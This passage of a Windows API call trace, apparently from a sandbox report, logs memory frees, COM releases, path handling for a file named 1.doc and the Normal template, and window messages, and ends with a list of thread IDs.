(This=0x7ffd098ff3f0, pv=0x1d39dbbd1a0) [0232.765] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc6c34, ImageBase=0x33e4fb98b0, HistoryTable=0x33e4fb98d0 | out: ImageBase=0x33e4fb98b0, HistoryTable=0x33e4fb98d0) returned 0x1d39dbc6c90 [0232.765] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b1508, ImageBase=0x33e4fb98b0, HistoryTable=0x33e4fb98d0 | out: ImageBase=0x33e4fb98b0, HistoryTable=0x33e4fb98d0) returned 0x1d39d8b1574 [0232.765] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b1464, ImageBase=0x33e4fb98b0, HistoryTable=0x33e4fb98d0 | out: ImageBase=0x33e4fb98b0, HistoryTable=0x33e4fb98d0) returned 0x1d39d8b14c0 [0232.766] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc6b7c, ImageBase=0x33e4fb98b0, HistoryTable=0x33e4fb98d0 | out: ImageBase=0x33e4fb98b0, HistoryTable=0x33e4fb98d0) returned 0x1d39dbc6bd8 [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc2390) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9e7520) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982190f0) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398218fd0) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39db06c10) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc8430) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a3770) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7d4480) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3d50) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dc24030) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8fe7a0) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da81000) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7beec0) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3f10) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3c70) [0232.766] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da82680) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3d10) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d848840) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8e2ea0) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7fad90) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d76a900) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7f8810) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b08b0) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3984c7ba0) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3984c8da0) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc5db0) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc6b30) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b13f0) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b0670) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b0430) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3984c9b20) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b01f0) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b11b0) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8af6b0) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39843a980) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38f2abc90) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d83bb30) [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d839f10) [0232.767] IUnknown:Release (This=0x1d39d552800) returned 0x1 [0232.767] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8f6d40) [0232.768] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39df10720) [0232.768] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8f9c30) [0232.768] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da40d10) [0232.768] VirtualFree (lpAddress=0x1d3a3d00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.769] VirtualFree (lpAddress=0x1d3a3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.770] VirtualFree (lpAddress=0x1d3a3d20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.770] VirtualFree (lpAddress=0x1d3a3d30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.771] VirtualFree (lpAddress=0x1d3a3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.772] VirtualFree (lpAddress=0x1d3a3d50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.773] VirtualFree (lpAddress=0x1d3a3d60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.773] VirtualFree (lpAddress=0x1d3a3d70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.774] VirtualFree (lpAddress=0x1d3a3d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.775] VirtualFree (lpAddress=0x1d3a3d90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.775] VirtualFree (lpAddress=0x1d3a3da0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.776] VirtualFree (lpAddress=0x1d3a3db0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.777] VirtualFree (lpAddress=0x1d3a3dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.777] VirtualFree (lpAddress=0x1d3a3dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9f95f0) [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409f020) [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38f0883a0) [0232.778] IUnknown:Release (This=0x1d39d552bc8) returned 0x4 [0232.778] IUnknown:Release (This=0x1d39d9d5068) returned 0x0 [0232.778] IUnknown:Release (This=0x1d39d552cd0) returned 0x0 [0232.778] IUnknown:Release (This=0x1d39d552800) returned 0x0 [0232.778] IUnknown:Release (This=0x1d39d5528b0) returned 0x0 [0232.778] IUnknown:Release (This=0x1d39d552b18) returned 0x2 [0232.778] IUnknown:Release (This=0x1d39d55b180) returned 0x0 [0232.778] IUnknown:Release (This=0x1d39d55b288) returned 0x0 [0232.778] IUnknown:Release (This=0x1d39d9d55e8) returned 0x0 [0232.778] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d827850, cb=0x0) returned 0x0 [0232.778] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d3a409eec0 [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a8cd0) [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409efb0) [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dc0efe0) [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d848220) [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9cb2c0) [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34b0) [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409eee0) [0232.778] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d86eb60) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409eeb0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409eec0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a8320) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d97e5e0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7fcf50) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7fd3d0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d83dbd0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a8ca0) [0232.779] wcsncpy_s (in: _Destination=0x33e4fb9780, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0232.779] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0232.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb96b0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0232.779] _wcsicmp (_String1="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _String2="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0 [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d614a40) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38f2aa670) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398636ff0) [0232.779] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d7be8d0, cb=0x0) returned 0x0 [0232.779] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d3a409f0e0 [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a97b0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38f2ab0f0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbe95b0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39db065c0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38f2b1000) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3350) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d826890) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409f0e0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a9670) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d97e9c0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da83580) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d613de0) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d614320) [0232.779] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38ef54750) [0232.780] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d86d1e0) [0232.780] VirtualFree (lpAddress=0x1d3a3170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.780] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d463020) [0232.780] VirtualFree (lpAddress=0x1d3a3130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.781] VirtualFree (lpAddress=0x1d3a3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.782] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398638010) [0232.782] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a4137b40) [0232.782] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da0d900) [0232.782] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a80e0) [0232.782] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d84f220) [0232.782] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39862ff10) [0232.782] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9d0dc0) [0232.782] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9cfd40) [0232.782] GetCapture () returned 0x0 [0232.782] GetCursorPos (in: lpPoint=0x33e4fb9c30 | out: lpPoint=0x33e4fb9c30*(x=1431, y=3)) returned 1 [0232.782] WindowFromPoint (Point=0x300000597) returned 0x10312 [0232.783] GetWindowThreadProcessId (in: hWnd=0x10312, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.887] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0232.887] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=7, lpWideCharStr=0x1d3a4286548, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0233.193] SysStringByteLen (bstr="潎浲污") returned 0x6 [0233.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286548, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0233.193] SysStringByteLen (bstr="潎浲污") returned 0x6 [0233.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286548, cbMultiByte=7, lpWideCharStr=0x1d39dc856e8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0233.197] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d84d930) [0233.197] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a7f40) [0233.197] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44ca60) [0233.198] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398707c40) [0233.198] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3987072a0) [0233.205] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d99a300) [0233.205] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d99ab00) [0233.205] IUnknown:Release (This=0x1d3980663b0) returned 0x3 [0233.205] IUnknown:Release (This=0x1d3985c4c00) returned 0xb [0233.205] IUnknown:Release (This=0x1d3980655f0) returned 0x5 [0233.206] IUnknown:Release (This=0x1d3985c5700) returned 0x2 [0233.206] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a7e20) [0233.206] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44c720) [0233.206] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d84e500) [0233.206] SetCursor (hCursor=0x10007) returned 0x10003 [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d847f10) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a1130) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a0fb0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a04f0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a03f0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a02b0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8257b0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5f6e30) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5f7f70) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5fb780) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5fa640) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5fbbd0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8f91e0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982156a0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982144d0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7d3d30) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb2150) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39db05780) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8fbe00) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da828c0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb20b0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da82380) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb2610) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbe4510) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8e3920) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7fcb90) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d76acc0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7fd0d0) [0233.207] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b0f70) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8af8f0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b1f30) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8ae4b0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8afd70) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b1cf0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8b0af0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8afb30) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3980a7130) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d83d3f0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d83cca0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d83df30) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da44190) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7d43b0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398215310) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d94ae90) [0233.208] IUnknown:Release (This=0x1d39d552b18) returned 0x0 [0233.208] IUnknown:Release (This=0x1d39d552bc8) returned 0x1 [0233.208] IUnknown:Release (This=0x1d39d552a68) returned 0x0 [0233.208] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398215190, cb=0x0) returned 0x0 [0233.208] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d3a409ff70 [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a8950) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982151f0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398215280) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8481b0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8e74b0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb1f30) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982154c0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d86ff80) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d83be00) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409ff70) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a7990) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d97f940) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982157c0) [0233.208] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982156d0) [0233.209] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7fc350) [0233.209] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7fb690) [0233.209] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d83d480) [0233.209] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a8940) [0233.209] wcsncpy_s (in: _Destination=0x33e4fbc440, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0233.209] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0233.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fbc370, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0233.209] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0233.214] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d86f160) [0233.214] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38f2a69b0) [0233.214] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d825e70) [0233.214] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a9730, cb=0x0) returned 0x0 [0233.214] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d3a409fe00 [0233.214] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a98c0) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38f2a8510) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a9740) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7de8e0) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38f2a5e40) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb33f0) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d827730) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409fe00) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a9620) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d980100) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da82080) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d86f4e0) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d86fa60) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9817e0) [0233.215] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d870420) [0233.215] VirtualFree (lpAddress=0x1d3a32b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.218] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44d0e0) [0233.218] VirtualFree (lpAddress=0x1d3a3270000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.219] VirtualFree (lpAddress=0x1d3a3260000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.220] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d83caf0) [0233.220] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d84dee0) [0233.220] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da0e610) [0233.220] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a7ef0) [0233.220] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d84dd90) [0233.220] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8e5d60) [0233.220] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8e4ce0) [0233.221] GetCapture () returned 0x0 [0233.221] GetCursorPos (in: lpPoint=0x33e4fbc8f0 | out: lpPoint=0x33e4fbc8f0*(x=1431, y=3)) returned 1 [0233.221] WindowFromPoint (Point=0x10000059a) returned 0x10312 [0233.221] GetWindowThreadProcessId (in: hWnd=0x10312, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0233.222] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398705720) [0233.226] SetCursor (hCursor=0x10007) returned 0x10003 [0234.110] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x1c, wParam=0x0, lParam=0x1078) returned 0x0 [0234.922] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0234.922] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0234.930] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7e9be0) [0234.930] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398602fa0) [0234.930] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3986032d0) [0234.930] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4627e0) [0234.930] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38f3068b0) [0234.930] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d786560) [0234.949] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3986a1600) [0234.949] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3986a3a90) [0234.949] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3986a7780) [0234.949] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3986a09d0) [0234.950] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7ffd08f10000 [0234.951] GetProcAddress (hModule=0x7ffd08f10000, lpProcName="DllDebugObjectRPCHook") returned 0x7ffd09657330 [0234.951] DllDebugObjectRPCHook () returned 0x1 [0234.952] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3986357c0) [0234.953] VirtualFree (lpAddress=0x1d3a3230000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.953] VirtualFree (lpAddress=0x1d3a3250000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.954] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44c5e0) [0234.954] VirtualFree (lpAddress=0x1d3a3240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.954] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44c920) [0234.955] VirtualFree (lpAddress=0x1d3a30f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.957] VirtualFree (lpAddress=0x1d3a3110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.958] VirtualFree (lpAddress=0x1d3a3100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.958] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7d0520) [0234.958] VirtualFree (lpAddress=0x1d39d370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.959] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4628e0) [0234.959] VirtualFree (lpAddress=0x1d3a30a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.959] VirtualFree (lpAddress=0x1d39bf30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9d2510) [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7cfd00) [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9cefd0) [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a432e630) [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398603660) [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3986036f0) [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a83f0) [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7de050) [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8e7b00) [0234.960] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9686c0) [0235.016] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 27 os_tid = 0x11a0 Thread: id = 28 os_tid = 0x1194 Thread: id = 29 os_tid = 0x1178 Thread: id = 30 os_tid = 0x112c Thread: id = 31 os_tid = 0xdd0 Thread: id = 32 os_tid = 0xdd8 Thread: id = 33 os_tid = 0xdf4 Thread: id = 34 os_tid = 0xd98 Thread: id = 35 os_tid = 0xe0c 